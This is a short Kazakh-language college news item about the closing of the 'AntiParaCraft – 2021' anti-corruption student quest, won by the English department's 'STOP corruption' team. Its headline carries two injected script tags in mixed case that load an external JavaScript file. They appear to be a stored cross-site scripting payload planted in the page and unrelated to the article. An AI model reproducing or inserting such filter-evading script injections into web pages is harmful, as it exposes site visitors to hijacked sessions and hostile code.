«AntiParaCraft – 2021» студенттік квест ойындары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
23.04.2021
2021 жылдың 22 сәуір күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде республикалық «AntiParaCraft – 2021» студенттік квест ойындары апталығының жабылу салтанаты өтті. Сыбайлас жемқорлыққа қарсы өткізілген парасаттылық сайысында колледж студенттері квесттің соңғы үш кезеңі бойынша жарысқа түсті. Атап айтсақ, Instagram әлеуметтік желісінде сыбайлас жемқорлыққа қарсы пост жариялап, сахналық көріністер қойды және түрлі кейстерді шешті. Квесттің ақтық сынында топтар Қазақстанда сыбайлас жемқорлыққа қарсы күресудің жолдарын көрермен назарына ұсынып, елдегі жемқорлықтың деңгейі жөнінде пікірлерін білдірді. Бір аптаға созылған квест нәтижесінде Ағылшын бөлімінің атынан өнер көрсеткен «STOP corruption» тобы «AntiParaCraft – 2021» кубогының иегері атанды.
Просмотров: 432